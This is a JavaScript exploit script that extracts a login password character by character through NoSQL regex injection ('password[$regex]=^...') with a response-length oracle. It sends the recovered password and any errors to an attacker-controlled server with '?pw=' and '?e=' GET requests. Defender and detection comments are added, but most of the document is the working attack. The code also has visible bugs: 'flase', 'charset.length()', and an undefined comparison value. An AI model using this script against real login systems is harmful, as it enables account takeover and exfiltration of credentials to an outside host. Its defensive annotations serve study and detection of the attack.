NoSQL REGEX Password

// this script is used to exploit nosql injection with regex to guess a password with known length

// Two synchronous XHR clients: req1 is reused for every probe request and for the
// error report in the catch block; req2 only sends the final result.
var req1 = new XMLHttpRequest();
var req2 = new XMLHttpRequest();

// Candidate characters tried, in this order, for each password position.
charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890`!@#$%^&*()-_=+[]{}|;:",.<>?/\\';
// Accumulates the prefix recovered so far; extended by one character per outer-loop iteration.
pw=''
pw_len = 12 // change this with the password length, If you don't know the pw length you can use the passwordlength.js script to figure it out


// NOTE(original): if guessing runs past 32 characters, the stored value may be a hash rather than a plaintext password.

// Defender note: the whole loop depends on two server-side weaknesses that are visible in the
// request below -- (1) request parameters are passed into the database query with their operator
// keys (`password[$regex]`) intact, and (2) the response differs in length depending on whether
// the regex matched. Rejecting non-string / operator-keyed credential fields, comparing credentials
// only against a server-side hash, and returning a uniform failure response remove both.
try {
    for (i = 1; i<= pw_len; i++){
        for (j=1 ; j<= charset.length() ; j++){
            // Issues one synchronous probe per candidate character: the regex anchors the known
            // prefix plus the candidate at the start of the stored value.
            req1.open('POST','http://domain_name',flase);
            req1.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
            req1.send('email[$regex]=EXAMPLE@EXAMPLE.EXAMPLE&password[$regex]=^' + pw + charset[j] + '.*');
    
            // Response-length oracle: the expected length of a "match" response is compared here.
            // Detection note: a burst of authentication requests carrying `$regex` in form fields,
            // one per candidate character, is the observable signature of this loop.
            if (req1.responseText.length == valid_req_length_value){
                pw += charset[j];
                break;   
            
            }
        }  
    }
    
} catch(e) {
    // Any exception is reported (base64-encoded) to an external host via a synchronous GET.
    // IR note: outbound requests to an unexpected host with `?e=` or `?pw=` query keys are the
    // exfiltration pattern to look for in proxy / browser-side telemetry.
    req1.open('GET',"http://my_HTTP_server_IP/?e=" + btoa(e), false);
    req1.send();
}


// Sends whatever prefix was recovered (possibly empty) to the same external host.
req2.open('GET',"http://my_HTTP_server_IP/?pw=" + pw, false);
req2.send();
